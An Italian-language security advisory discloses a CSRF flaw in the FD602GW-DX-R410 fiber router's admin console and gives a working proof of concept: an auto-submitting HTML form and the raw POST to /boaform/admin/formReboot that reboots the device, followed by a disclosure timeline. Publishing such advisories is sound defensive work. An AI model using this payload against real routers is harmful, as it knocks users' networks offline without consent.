
Vulnerabilità CSRF nel router FD602GW-DX-R410 permette a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato.
Proof of Concept e Advisory di Sicurezza per una vulnerabilità di Cross-Site Request Forgery (CSRF) nell'interfaccia di amministrazione del router fiber FD602GW-DX-R410 (Firmware V2.2.14). L'advisory delinea l'impatto, il vettore di attacco e le raccomandazioni per la mitigazione.
La vulnerabilità CSRF nel router FD602GW-DX-R410 consente a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato.
Una vulnerabilità Cross-Site Request Forgery (CSRF) è stata scoperta nella console di amministrazione web del router fiber FD602GW-DX-R410 (Firmware V2.2.14). L'endpoint /boaform/admin/formReboot accetta richieste POST che attivano un riavvio completo del dispositivo senza token CSRF o validazione dell'origine. Se un amministratore autenticato visita una pagina dannosa, il router può essere riavviato da remoto senza consenso.
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK; Il router si riavvia immediatamente.
| Data | Azione |
|---|---|
| Giu 2025 | Vulnerabilità scoperta |
| Giu 2025 | Tentativo di divulgazione responsabile (nessuna risposta) |
| Lug 2025 | Richiesto ID CVE a MITRE |
| Lug 2025 | Advisory preparato e in attesa di pubblicazione |
| Set 2025 | CVE Assegnato, Advisory reso pubblico |
Questo advisory è fornito a scopo educativo e di sensibilizzazione sulla sicurezza. L'autore non si assume alcuna responsabilità per un uso improprio. Tutti i test sono stati eseguiti in un ambiente controllato.